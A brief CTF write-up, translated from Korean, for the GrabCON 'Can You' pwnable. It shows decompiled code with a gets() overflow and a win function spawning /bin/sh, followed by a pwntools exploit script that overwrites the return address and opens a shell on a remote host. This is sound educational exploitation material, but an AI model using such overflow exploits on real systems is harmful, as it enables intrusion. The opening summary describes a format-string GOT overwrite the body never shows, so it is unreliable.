2021-09-09 · 2분
GrabCON CTF — Can You write-up
GrabCON pwnable の write-up(cancancan):スタックカナリーリークという赤ニシンを追いかけた後、printf(buf) に offset 6 の FSB があることに気づき、read の GOT エントリを win 関数で上書きする。
2021-09-09 · 1분
この記事は公開から2年以上経過しています。
GrabCON CTF
今回の GrabCON に参加して、pwnable だけ少し解いて抜けました。全 4 問ありましたが 3 問しか解けなくてとても悲しいです ㅠ。
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4[48]; // [rsp+0h] [rbp-30h] BYREF
gets(v4, argv, envp);
printf("well lets check if you can bypass me!!!");
return 0;
}
__int64 vuln()
{
execve("/bin/sh", 0LL, 0LL);
return 0LL;
}
あまりにも簡単な BOF 問題のようです。ファイルは 64BIT で、ペイロードは dummy[48] + sfp[8] + vuln になりそうです。
ソースコード
もっと見る
from pwn import *
p = remote('35.205.161.145', 49153)
vuln = p64(0x401146)
payload = b''
payload += b'A'*56 + vuln
p.sendline(payload)
p.interactive()
[ハッキング/システムハッキング] - [システムハッキング] Buffer Overflow (BOF)
[[システムハッキング] Buffer Overflow (BOF)
BUFFER OVERFLOW BOF 設定されているバッファのサイズより大きく入力を受け取れるときに生じる脆弱性です。int __cdecl main(int argc, const char **argv, const char **envp) { char s[40]; // [esp+4h] > ebp-34h..
— nabomhalang.tistory.com
原文(韓国語): tistory — 2021-09-09 公開、当ブログへ移行。この翻訳は AI の協力で作成されました。
…